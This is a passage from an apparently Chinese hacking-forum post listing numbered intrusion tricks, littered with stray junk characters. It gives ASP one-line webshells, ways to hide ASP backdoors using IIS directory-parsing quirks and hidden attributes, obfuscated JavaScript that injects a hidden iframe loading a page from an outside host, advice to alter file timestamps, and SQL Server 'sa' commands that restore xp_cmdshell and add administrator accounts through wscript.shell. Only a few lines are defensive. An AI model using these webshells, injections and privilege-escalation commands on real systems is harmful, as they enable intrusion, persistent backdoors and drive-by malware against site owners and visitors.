d).<script language=VBScript runat=server>execute request("sb")</Script>
2 r$ `6 A9 L. A& ?# P5 u7 d. Ve).<%25Execute(request("l"))%25>( Y. L" M! P0 R5 ~
f).<%if request("cmd")<>"" then execute request("pass")%>2 G) }$ N% ~* ]6 W7 [, q' O

* i. ^5 x" |5 i1 G# b52、at "12:17" /interactive cmd; s. J0 Y6 [; P2 @1 H
执行后可以用AT命令查看新加的任务% x, X8 S" V  V3 D
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
, n- u2 H  D9 o( I$ W) |' o" }/ \; ?# p5 M! H% T' ]; H" `
53、隐藏ASP后门的两种方法; M1 g/ z/ ]+ {
1、建立非标准目录:mkdir images..\
( B+ b  ~! D1 U4 H! c# w拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
. P1 i# o6 l* o; R! i* y% f9 S通过web访问ASP木马:http://ip/images../news.asp?action=login
$ i" n" i& e1 P2 J' u- b- @如何删除非标准目录:rmdir images..\ /s3 o' I5 E6 m- i
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
* I5 S$ a+ |; B! Y5 W: F) E- Ymkdir programme.asp/ W( o/ O8 W* `& b: R7 d' V
新建1.txt文件内容:<!--#include file=”12.jpg”-->; E% M. G; E* g3 V
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件9 r$ O8 H* Q+ W: H
attrib +H +S programme.asp% q6 R3 J  `8 p. t& X! d! V1 `
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
: q6 N0 ~) G# U0 Y/ ~& s2 S; n& T- x/ J6 c4 a- I8 O
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。: q6 Q( m# V  C3 N6 M: [
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。7 O. E* Z5 b0 y6 [
- ?. }2 F/ }4 @5 j. x  H5 L' J
55、JS隐蔽挂马
# e- F( O  V/ k1 F+ Q/ G1., }9 O8 W) }0 Q$ f3 ?/ }
var tr4c3="<iframe src=ht";" ~$ |0 }8 _4 i! r
tr4c3 = tr4c3+"tp:/";# y; H8 s+ M2 _
tr4c3 = tr4c3+"/ww";
( o$ J. D9 B. Rtr4c3 = tr4c3+"w.tr4";
! f( O( m' z" F$ ptr4c3 = tr4c3+"c3.com/inc/m";
. a  c0 h& U; A9 p$ T# [tr4c3 = tr4c3+"m.htm style="display:none"></i";/ B6 g8 }! O% B" u& Z( ?) ]; I  o! p
tr4c3 =tr4c3+"frame>'";
8 s% [* y* T7 C( M6 Cdocument.write(tr4c3);6 i; t' ~- c( D: V  {
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
; q. o! ?6 i+ w$ |! W) N6 N4 M3 k% l* v6 t
2.
; q% M( c1 w3 B/ Y转换进制,然后用EVAL执行。如/ H" B# z& A" R" l, Z7 X
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");% L% ]: v5 A" A  v- k0 a- P; M( O
不过这个有点显眼。
$ A; i# r5 D  F. O; \/ a3.2 F: s' M0 n6 ?; r8 q
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');. b) M9 q& h) q
最后一点,别忘了把文件的时间也修改下。
) x+ C6 v7 r/ a- {) S6 j/ V( {# C/ S* ]( n* `2 u
56.3389终端入侵常用DOS命令
/ g. h+ C2 `( K7 N) m' Z! ?' {; rtaskkill taskkill /PID 1248 /t$ q2 X) i: [/ P

6 ]/ u' g5 P/ d" xtasklist 查进程+ q5 O/ y. |2 g) q6 v
4 a( [& L' y3 a/ T
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限& o* ?9 V2 N* X- |; ]9 G
iisreset /reboot7 {& S' l' o8 A
tsshutdn /reboot /delay:1    重起服务器7 r* s% b# v$ w' V4 ?' r
+ \; D" p+ |% E2 r% n3 M0 Z
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,. a6 x( s0 O" k  r! \) c
8 ^. r$ ^6 P3 m: ~
query user 查看当前终端用户在线情况" O5 Q# ~' q4 `/ K) S. u' C1 t

) Q3 w, K$ X. q! V6 W; l; e! h& L# o+ U要显示有关所有会话使用的进程的信息,请键入:query process *
% Q; p# G8 U. W# A7 |6 X$ m0 i7 H7 ^; p* ]
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:27 n9 \2 w/ T0 x- D7 @7 V" U

. w! V1 t5 x; Q3 H  i要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
# r5 o9 d" S8 @- {! f2 q
( G: c9 {* U4 t3 d% Z要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
/ b- @# o% C; ^! [  p  @0 {6 K
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启* j' N. A( I1 X; ?! w9 B+ c

3 O  W* ^  Y' Y9 d" }& v命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
% N+ L4 G, s, N3 K
/ X, d6 p1 T; N$ f; R: h# a" N命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
; [1 Q& B$ B  a: y6 `+ L% `: z
. [3 L2 u0 i5 ^  i" ^命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机7 y% W7 Y" R! f2 @7 @

2 ?/ \8 A/ n% O: Q- g56、在地址栏或按Ctrl+O,输入:
+ h: I7 F8 T" M# G; hjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
  n# \/ R2 v- z/ b2 H6 ^( g& a  u! r: ^
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
5 @2 Q* \7 ^' j2 l% {% V
7 v1 e/ M4 O3 }9 b! e57、net user的时候,是不能显示加$的用户,但是如果不处理的话,3 S+ c" `& _& e: [0 Q5 r
用net localgroup administrators是可以看到管理组下,加了$的用户的。: `) O4 w! W1 `( ]8 P; ]( y7 T
* r' L4 B- x: T5 e8 A# D" o
58、 sa弱口令相关命令3 [, m- y0 Z# H/ j) D0 X; w  p2 b* P

4 E" O! u1 Z5 M一.更改sa口令方法:
- w3 o" U. k+ n" K& B6 D用sql综合利用工具连接后,执行命令:1 t& v$ x& O' ^( i9 h
exec sp_password NULL,'20001001','sa'9 E4 ^7 C7 o0 h5 z1 n
(提示:慎用!)
+ [1 U8 I! p1 c
" {( F' w. J8 Z- D$ ]二.简单修补sa弱口令.: p# \" P7 Q+ p# h

; M2 ]1 `* k# V2 j- M3 h方法1:查询分离器连接后执行:2 b7 n6 z  L  U1 {7 u
if exists (select * from
6 c/ J+ T5 u6 s, U+ Udbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
: W4 A+ U" a% y% q1 n; `% G! K) I$ yOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
, l( z. G. R3 w9 O$ \- v3 r6 e1 C3 }
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
9 J, E( E$ K+ L* o
2 R9 }9 W+ A3 W5 m4 tGO. [- e5 x+ _/ l1 y$ E' t6 Z
3 p& [' y" |' L+ h8 I( u$ P3 I' H3 Y
然后按F5键命令执行完毕$ [& S0 R. x) J% u' p( \9 \
% [3 n( V7 `5 }) \* U
方法2:查询分离器连接后
- a0 _6 B) u  k第一步执行:use master
: m+ @' O6 p4 }9 B第二步执行:sp_dropextendedproc 'xp_cmdshell'4 p7 ?# ]% k1 `7 X" x
然后按F5键命令执行完毕3 u6 f! C/ n, N
# B  i% i9 i5 w0 t  k" p
: y% ^1 X+ V5 ?  b' u0 t# K
三.常见情况恢复执行xp_cmdshell.3 M3 F( J- t- ^$ z. G
; }+ A5 v! e0 D
# ^5 [0 i5 y1 ]! n3 P
1 未能找到存储过程'master..xpcmdshell'." ?/ g5 e& N+ T( w/ h
   恢复方法:查询分离器连接后,( H) {) u( ]5 F& N  ]
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int: J3 \+ T) C4 M/ Z
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'0 b  X9 C. h4 V' z
然后按F5键命令执行完毕
) F+ q* U) c3 _# {! X$ D
3 S( V) J/ f+ Z- M4 l; }$ K2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
! W1 h9 M; u1 f  }# @7 b; _# l恢复方法:查询分离器连接后,, P3 A4 l1 _4 R. p7 L- L
第一步执行:sp_dropextendedproc "xp_cmdshell"5 e2 b. [7 u* E/ m4 U
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
( X  C  ]5 D& j) a+ ]. S3 J然后按F5键命令执行完毕
0 y& Y1 n9 Z* I6 n6 m# Y+ t
) K( r& Z& R1 `- e# h5 p3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。). t; |& o4 w# S- M! N8 k
恢复方法:查询分离器连接后,2 O$ u( W5 m/ o
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
9 c+ h$ _, u( _3 U! z第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
* X2 c7 Q: V! {然后按F5键命令执行完毕# }! y% Q) A" M! C* j2 g) w+ V, Q
" W1 W5 i  M' q9 R, S# q- W' h
四.终极方法.
6 Q' u1 x  Q$ y4 P% N7 E4 a* Q) M/ a如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:5 D, M+ b8 `- O
查询分离器连接后,
) S! ]' Z$ }+ \6 [2000servser系统:% N( |- P  u; V7 @0 y2 n9 r  {, i2 C
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'  S$ n7 q1 o4 N3 r) [

! _5 ?& @, c8 ^& B8 l+ adeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'9 b+ N1 P# }% P) C2 |% P4 S3 ]

& W3 O$ K% u* l5 N8 p4 D/ rxp或2003server系统:
+ F7 v/ V2 C% Q1 ^. k/ v% [9 \
; L- @3 o$ G* N' K; [declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'" z% D5 e- ]2 p5 A& m" G6 p
. x. o: @5 v# X" L5 P4 J+ s$ s% B
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
8 c  e5 \3 y0 y. e3 P( g3 v! w
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表